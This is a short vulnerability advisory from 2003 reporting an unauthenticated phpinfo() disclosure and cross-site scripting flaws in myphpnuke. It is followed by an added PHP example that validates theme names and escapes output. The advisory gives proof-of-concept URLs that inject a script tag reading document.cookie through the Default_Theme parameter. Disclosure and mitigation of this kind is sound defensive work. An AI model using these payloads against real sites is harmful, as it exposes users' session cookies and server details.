Mindwarper
07/01/03, 01:33
myphpnuke version 1.8.8_final_7 and prior that contain sysinfo are
vulnerable to both a cross-site scripting (CSS) attack and phpinfo()
disclosure. The problem is that, unlike the rest of the scripts under
/admin/, sysinfo's footer script, system_footer.php, does not check who
the user is.
Inside system_footer.php the following code is run:
    echo "<br>";
    phpinfo();
    echo "<br>";
This shows any remote user sensitive data about the server.
-
Another problem in myphpnuke is the unchecked template includes.
Examples:
http://victim/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
...and a couple more of these exist.
- Mindwarper
-- logger@hehe.com
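
One way to close the Default_Theme hole described above, as an added example (not myphpnuke code and not from the advisory's author): accept the parameter only if it names an installed theme, and escape it when it is written into HTML. The function names, the themes/<name>/style.css layout and the "Classic" theme are assumptions made for illustration.

```php
<?php
// Added example, not myphpnuke code. Assumes one directory per theme under
// $themesDir and that the theme name ends up in an HTML attribute.

/**
 * Return $candidate only if it is a plain directory name that exists
 * under $themesDir; otherwise return $fallback.
 */
function resolve_theme($candidate, string $themesDir, string $fallback): string
{
    // Reject arrays (?Default_Theme[]=x) and anything that is not a short
    // run of letters, digits, underscore or hyphen. That excludes quotes,
    // angle brackets, slashes, dots and NUL bytes in one step.
    if (!is_string($candidate) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $candidate)) {
        return $fallback;
    }
    // The name must also match a theme that is actually installed.
    return is_dir($themesDir . '/' . $candidate) ? $candidate : $fallback;
}

/** Build the stylesheet tag, escaping the value for an HTML attribute. */
function theme_stylesheet_tag(string $theme): string
{
    $href = 'themes/' . rawurlencode($theme) . '/style.css';
    return '<link rel="stylesheet" href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed demo: a temporary themes directory with one theme installed.
$themesDir = sys_get_temp_dir() . '/themes_demo_' . getmypid();
@mkdir($themesDir . '/Classic', 0700, true);

$inputs = [
    'Classic',                                    // installed theme
    "'<script>alert(document.cookie);</script>",  // value from the advisory's URLs
    'Missing',                                    // well-formed but not installed
    ['x'],                                        // array parameter
];
foreach ($inputs as $in) {
    $theme = resolve_theme($in, $themesDir, 'Classic');
    echo theme_stylesheet_tag($theme), "\n";
}

rmdir($themesDir . '/Classic');
rmdir($themesDir);
```

The same pattern applies to system_footer.php: the phpinfo() call belongs behind the administrator check that the advisory says the other /admin/ scripts perform.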